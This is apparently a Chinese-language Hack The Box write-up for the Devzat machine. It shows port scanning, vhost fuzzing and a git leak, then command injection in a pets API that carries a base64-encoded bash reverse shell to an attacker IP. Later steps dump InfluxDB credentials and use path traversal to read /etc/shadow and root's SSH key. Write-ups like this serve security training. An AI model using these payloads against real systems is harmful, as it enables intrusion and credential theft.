基本信息

端口扫描

22,80,8000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ nmap -sC -sV 10.10.11.118

Starting Nmap 7.92 ( https://nmap.org ) at 2021-10-19 14:02 CST
Nmap scan report for 10.10.11.118
Host is up (0.069s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c2:5f:fb:de:32:ff:44:bf:08:f5:ca:49:d4:42:1a:06 (RSA)
|   256 bc:cd:e8:ee:0a:a9:15:76:52:bc:19:a4:a3:b2:ba:ff (ECDSA)
|_  256 62:ef:72:52:4f:19:53:8b:f2:9b:be:46:88:4b:c3:d0 (ED25519)
80/tcp   open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://devzat.htb/
8000/tcp open  ssh     (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-Go
| ssh-hostkey:
|_  3072 6a:ee:db:90:a6:10:30:9f:94:ff:bf:61:95:2a:20:63 (RSA)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8000-TCP:V=7.92%I=7%D=10/19%Time=616E5FA6%P=x86_64-apple-darwin20.4
SF:.0%r(NULL,C,"SSH-2\.0-Go\r\n");
Service Info: Host: devzat.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.93 seconds

80

ip访问自动跳域名,加hosts:

8000

8000是SSH-2.0-Go,80界面那里也有提示:

根据相关信息可以搜到:

测试连接,暂时没什么可利用的:

子域名

子域名因为不存在的都会302,ffuf更适合处理,gobuster也能用:

1
2
3
4
5
gobuster vhost -u http://devzat.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 | grep 200

ffuf -c -u http://devzat.htb -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.devzat.htb"  -mc 200

pets.devzat.htb

pets.devzat.htb

有个添加功能,两个参数,json格式:

git leak

很容易发现git泄漏:

1
gobuster dir -u http://pets.devzat.htb/ -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 --wildcard  --exclude-length 510

代码审计

git dump后代码审计,很明显的命令注入,添加宠物功能传入name和species参数,species参数直接拼接到cmd中:

shell

base64编码,排除一些字符干扰:

1
2
3
4
echo "bash -c 'exec bash -i &>/dev/tcp/10.10.14.5/4444 <&1'" | base64
YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTAuMTAuMTQuNS80NDQ0IDwmMScK

{"name":"miao","species":"cat;echo -n 'YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTAuMTAuMTQuNS80NDQ0IDwmMScK' | base64 -d | bash"}

当前patrick用户.ssh目录有私钥,ssh登录方便后续操作:

信息

简单枚举可以发现本机开了几个端口,转发出去发现是InfluxDB:

1
ssh -L 8086:127.0.0.1:8086 -i patrick_id_rsa patrick@10.10.11.118

InfluxDB

搜到相关漏洞:

数据库里得到用户名密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
{
    "results": [
        {
            "series": [
                {
                    "columns": [
                        "time",
                        "enabled",
                        "password",
                        "username"
                    ],
                    "name": "user",
                    "values": [
                        [
                            "2021-06-22T20:04:16.313965493Z",
                            false,
                            "WillyWonka2021",
                            "wilhelm"
                        ],
                        [
                            "2021-06-22T20:04:16.320782034Z",
                            true,
                            "woBeeYareedahc7Oogeephies7Aiseci",
                            "catherine"
                        ],
                        [
                            "2021-06-22T20:04:16.996682002Z",
                            true,
                            "RoyalQueenBee$",
                            "charles"
                        ]
                    ]
                }
            ],
            "statement_id": 0
        }
    ]
}

catherine & user flag

得到了catherine用户密码,不能ssh,可以su切过去读取user.txt:

提权信息

backups有两个zip,dev解压查看代码可以发现一个file command可以读文件,密码硬编码:

root flag

文件里可以知道端口是8443,file命令读取root.txt:

1
2
3
/file ../../root/root.txt CeilingCatStillAThingIn2021?
/file ../../etc/shadow CeilingCatStillAThingIn2021?
/file ../../root/.ssh/id_rsa CeilingCatStillAThingIn2021?

参考资料